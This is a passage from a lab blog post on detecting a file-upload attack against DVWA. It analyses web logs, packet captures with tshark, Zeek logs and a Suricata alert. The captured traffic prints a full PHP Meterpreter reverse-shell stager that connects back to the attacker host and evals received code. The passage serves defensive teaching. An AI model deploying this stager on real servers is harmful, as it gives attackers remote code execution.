</pre></div>
</div><div><br /></div><div><div>While we can do more, there is no need for this at this point. Objective achieved!</div><div><br /></div><div>Exit Meterpreter:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">meterpreter > exit -j</span>
<span style="color: white;">[*] Shutting down Meterpreter...</span>
</pre></div>
</div><div><br /></div><div>Transitioning to log analysis.<br /><br /></div><p><b><span style="font-size: medium;">Detect - Log Analysis</span></b></p><p>Looking at the HTTP <i>access.log</i> file, there is nothing standing out here. Realistically, the only question to be asked here is if files should have been able to access from "<i>/dvwa/hackable/uploads</i>". Other than that, there is nothing here that stands out to me to suggest there was a problem.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"</span>
<span style="color: white;">10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"</span>
</pre></div>
<br />Transitioning to packet analysis<div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br /></div><div>Setup for packet analysis. Capture packets on ports 80,443 or 9999</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -w ./file_upload.pcap -f 'tcp port(80 or 443 or 9999)' --interface eth0 </span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:213735) 14:10:39.726904 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:213735) 14:10:39.726964 [Main MESSAGE] -- File: "./file_upload.pcap"</span>
</pre></div>
</div><div><br /></div><div><div>Analyzing the PCAP. No noeed to go through the entire process. We've done a lot of the heavy lifting in the earlier posts. Hence building on what was done before.</div><div><br /></div><div>How many unique streams/sessions do we have in this PCAP.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -T fields -e tcp.stream | sort --unique | wc --lines</span>
<span style="color: white;">5</span>
</pre></div>
</div><div><br /></div><div><div>With 5 streams, we should be able to quickly analyze these. Starting with stream 0.</div><div><br /></div><div>Looking at the first 30 lines of the reassembled TCP stream.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | head --lines=30</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 0</span>
<span>Node 0: 10.0.0.108:55686</span>
<span>Node 1: 10.0.0.106:80</span>
<span>1460</span>
<span style="font-weight: bold;">POST</span> <span>/dvwa/vulnerabilities/upload/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span>
<span style="font-weight: bold;">Accept-Language</span><span>:</span> <span>en-US,en;q=0.5</span>
<span style="font-weight: bold;">Accept-Encoding</span><span>:</span> <span>gzip, deflate</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>multipart/form-data; boundary=---------------------------40506030756611040921021496595</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>64966</span>
<span style="font-weight: bold;">Origin</span><span>:</span> <span>http://10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>keep-alive</span>
<span style="font-weight: bold;">Referer</span><span>:</span> <span>http://10.0.0.106/dvwa/vulnerabilities/upload/</span>
<span style="font-weight: bold;">Cookie</span><span>:</span> <span>security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf</span>
<span style="font-weight: bold;">Upgrade-Insecure-Requests</span><span>:</span> <span>1</span>
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
Content-Type: image/png
.PNG</span>
</pre></div>
</div><div><br /></div><div><div>We see above, the file which was uploaded have a name of "<i>hack_and_detect.png</i>" and it's a <i>.PNG</i> image file as can be seen from "Content-Type: image/png".</div><div><br /></div><div>Was this file upload successful? Looking for any report of the file name being successfully uploaded.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | grep "hack_and_detect"</span>
<span style="color: white;">Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"</span>
<span><span style="color: white;">..<pre>.</span><b><span style="color: #fcff01;">./../hackable/uploads/hack_and_detect.png succesfully uploaded</span></b><span style="color: white;">!</pre></span></span>
</pre></div>
</div><div><br /></div><div>Let's see what is in stream 1.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,1 | head --lines=25</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 1</span>
<span>Node 0: 10.0.0.108:55814</span>
<span>Node 1: 10.0.0.106:80</span>
<span>116</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa//hackable/uploads/hack_and_detect.png</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
1460
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:24:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 22 Jun 2023 19:23:33 GMT
ETag: "fbed-5febcd1f850e8"
Accept-Ranges: bytes
Content-Length: 64493
Content-Type: image/png
.PNG</span>
</pre></div>
</div><div><br /></div><div><div>Above looks like a request was made for the same image, which was previously uploaded.</div><div><br /></div><div>Looking at stream 2</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | head --lines=33</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 2</span>
<span>Node 0: 10.0.0.108:47986</span>
<span>Node 1: 10.0.0.106:80</span>
<span>1460</span>
<span style="font-weight: bold;">POST</span> <span>/dvwa/vulnerabilities/upload/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span>
<span style="font-weight: bold;">Accept-Language</span><span>:</span> <span>en-US,en;q=0.5</span>
<span style="font-weight: bold;">Accept-Encoding</span><span>:</span> <span>gzip, deflate</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>multipart/form-data; boundary=---------------------------3215483674970812347988844840</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>1582</span>
<span style="font-weight: bold;">Origin</span><span>:</span> <span>http://10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>keep-alive</span>
<span style="font-weight: bold;">Referer</span><span>:</span> <span>http://10.0.0.106/dvwa/vulnerabilities/upload/</span>
<span style="font-weight: bold;">Cookie</span><span>:</span> <span>security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf</span>
<span style="font-weight: bold;">Upgrade-Insecure-Requests</span><span>:</span> <span>1</span>
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
Content-Type: application/x-php
/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_ty
752
pe) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------3215483674970812347988844840</span>
</pre></div>
</div><div><br /></div><div><div>There we see a php file was uploaded. Was the upload successful?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | grep "malicious.php"</span>
<span style="color: white;">Content-Disposition: form-data; name="uploaded"; filename="malicious.php"</span>
<span><span style="color: white;">..<pre></span><b><span style="color: #fcff01;">../../hackable/uploads/malicious.php succesfully uploaded!<</span></b><span style="color: white;">/pre></span></span>
</pre></div>
</div><div><br /></div><div>Yes it was. Moving on to stream 3.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/file_upload]</span>
<span>└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,3 </span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 3</span>
<span>Node 0: 10.0.0.108:33048</span>
<span>Node 1: 10.0.0.106:80</span>
<span>109</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa/hackable/uploads/malicious.php</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
214
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:28:29 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2
/*
5
0
===================================================================</span>
</pre></div>
</div><div><br /></div><div>Stream <i>3</i> seems to be just the request for the <i>malicious.php</i> file using <i>curl</i> but not much details in side the response. Very interesting.</div><div><div><br /></div><div>Looking at stream 4.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | more </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: tcp,ascii</span>
<span style="color: white;">Filter: tcp.stream eq 4</span>
<span style="color: white;">Node 0: 10.0.0.106:49786</span>
<span style="color: white;">Node 1: 10.0.0.108:9999</span>
<span style="color: white;"> 4</span>
<span style="color: white;">....</span>
<span style="color: white;"> 1460</span>
<span style="color: white;">/*<?php /**/</span>
<span style="color: white;">if (!isset($GLOBALS['channels'])) {</span>
<span style="color: white;"> $GLOBALS['channels'] = array();</span>
<span style="color: white;">}</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>We see something here to do with <i>.php</i>. Looking further in the payload we ultimately see.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | grep meter</span>
<span style="color: white;">my_print("Evaling main meterpreter stage");</span>
</pre></div>
</div><div><br /></div><div><div>That's a big clue that we have a real problem here on port 9999.</div><div><br /></div><div>At this point, we know there are a number of files within these HTTP sessions. Fortunately, TShark can extract content from HTTP so we don't have to manually attempt to carve any of these. Let's extract those files with TShark.</div><div><br /></div><div>Looking at the help, we see the TShark --export-objects usage.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark --export-objects --help </span>
<span style="color: white;">tshark: "--export-objects" are specified as: <protocol>,<destdir></span>
<span style="color: white;">tshark: The available export object types for the "--export-objects" option are:</span>
<span style="color: white;"> dicom</span>
<span style="color: white;"> ftp-data</span>
<span style="color: white;"> http</span>
<span style="color: white;"> imf</span>
<span style="color: white;"> smb</span>
<span style="color: white;"> tftp</span>
</pre></div>
</div><div><br /></div><div>Exporting from HTTP.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ tshark -n -r file_upload.pcap -q --export-objects http,./exported-contents/</span>
</pre></div>
</div><div><br /></div><div>Looking at the exported contents we see:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ ls -l exported-contents/</span>
<span style="color: white;">total 144</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64493 Jun 23 08:31 hack_and_detect.png</span>
<span><span style="color: white;">-rw-r--r-- 1 kali kali 2 Jun 23 08:31 </span><b><span style="color: #fcff01;">malicious.php</span></b></span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64966 Jun 23 08:31 upload</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 4061 Jun 23 08:31 'upload(1)'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1582 Jun 23 08:31 'upload(2)'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 4055 Jun 23 08:31 'upload(3)'</span>
</pre></div>
</div><div><br /></div><div><div>Confirming the files using the file command.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ file exported-contents/*</span>
<span style="color: white;">exported-contents/hack_and_detect.png: PNG image data, 178 x 127, 8-bit/color RGBA, non-interlaced</span>
<b><span style="color: #fcff01;"><span>exported-contents/malicious.php: ASCII text, with no line terminators</span>
</span></b><span style="color: white;">exported-contents/upload: data</span>
<span style="color: white;">exported-contents/upload(1): HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators</span>
<span style="color: white;">exported-contents/upload(2): ASCII text, with very long lines (1111), with CRLF line terminators</span>
<span style="color: white;">exported-contents/upload(3): HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators</span>
</pre></div>
</div><div><br /></div><div><div>At this point, you can analyze the file as needed. I will transition to Zeek to see what is saw.</div></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div>Setup Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Focusing on the indicators of compromise, "<i>hack_and_detect.png</i>" and "<i>malicious.php</i>". First "<i>hack_and_detect.pn</i>g"</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">└─$ cat http.log | grep --perl-regexp "hack_and_detect" </span>
<span style="color: white;">1687461839.117382 CcgONKdzshQp8ZH68 10.0.0.108 55686 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 64966 4061 200 OK - - (empty) - - - F8D5nXnU24QCFs3ni,FL8pyG3KgVYBxGp5J8,FjahXg2bW4MO7TWJok hack_and_detect.png image/png Fr5Uwyf1md9rma0F1 - text/html</span>
<span style="color: white;">1687461900.287690 Ca15Kb1F57kcgJCx8j 10.0.0.108 55814 10.0.0.106 80 1 GET 10.0.0.106 /dvwa//hackable/uploads/hack_and_detect.png - 1.1 curl/7.88.1 - 0 64493 200 OK - - (empty) - - - - - - FRXytH1roWzznSMp5d - image/png</span>
</pre></div>
</div><div><br /></div><div>Looking at <i>malicious.php</i>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload] </span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "malicious.php"</span>
<span style="color: white;">1687462020.720561 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 1582 4055 200 OK - - (empty) - - - FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa malicious.php text/x-php Fnwwck3gnEGZ79OWy1 - text/html</span>
<span style="color: white;">1687462143.814819 CwNOXb1eZ6LvtPEI96 10.0.0.108 33048 10.0.0.106 80 1 GET 10.0.0.106 /dvwa/hackable/uploads/malicious.php - 1.1 curl/7.88.1 -02 200 OK - - (empty) - - - - - - FVkDFy3Q20vdj9aPCk - -</span>
</pre></div>
</div><div><br /></div><div>Looking across the various logs for the UID "<i>C9k6p6FxgHAgjfjGa</i>" and removing the files with 0 bytes, we get</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ grep "C9k6p6FxgHAgjfjGa" *.log | grep --perl-regexp "1111|4055" </span>
<span><span style="color: white;">files.log:1687462020.720573 F3m3sc1e7ZmJMAs5Cc C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 HTTP 0 (empty) text/x-php </span><b><span style="color: #fcff01;">malicious.php</span></b><span style="color: white;"> 0.000000 - T 1111 - 0 0 F - - - - - --</span></span>
<span style="color: white;">files.log:1687462020.751930 Fnwwck3gnEGZ79OWy1 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000001 - F 4055 4055 0 0 F - - - - - - -</span>
<span style="color: white;">http.log:1687462020.720561 C9k6p6FxgHAgjfjGa 10.0.0.108 47986 10.0.0.106 80 1 POST 10.0.0.106 /dvwa/vulnerabilities/upload/ http://10.0.0.106/dvwa/vulnerabilities/upload/ 1.1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 http://10.0.0.106 1582 4055 200 OK - - (empty) - - - FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa malicious.php text/x-php Fnwwck3gnEGZ79OWy1 - text/html</span>
</pre></div>
</div><div><br /></div><div><div>Obviously, there are entries in the <i>conn.log</i> file. However, the objective is to keep things simple for this analysis.</div><div><br /></div><div>Moving on the the IDS/IPS.</div></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div>Setup Suricata to operate in IDS mode</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div>How many alerts triggered for this activity?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata] └─$ cat fast.log | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines</span>
<span style="color: white;">1 </span>
</pre></div>
</div><div><br /></div><div>Hmmm! One alert! Interesting!!</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat fast.log </span>
<span style="color: white;">06/22/2023-15:27:00.720561 [**] [1:2011768:8] ET WEB_SERVER PHP tags in HTTP POST [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:47986 -> 10.0.0.106:80</span>
</pre></div>
</div><div><br /></div><div>Looking at the <i>alert-debug.log</i> file</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat alert-debug.log | more </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 06/22/2023-15:27:00.720561</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.108</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 47986</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2986100032</span>
<span style="color: white;">TCP ACK: 2432827111</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 06/22/2023-15:27:00.719233</span>
<span style="color: white;">FLOW PKTS TODST: 3</span>
<span style="color: white;">FLOW PKTS TOSRC: 1</span>
<span style="color: white;">FLOW Total Bytes: 1708</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 1514</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;">...</span>
</pre></div>
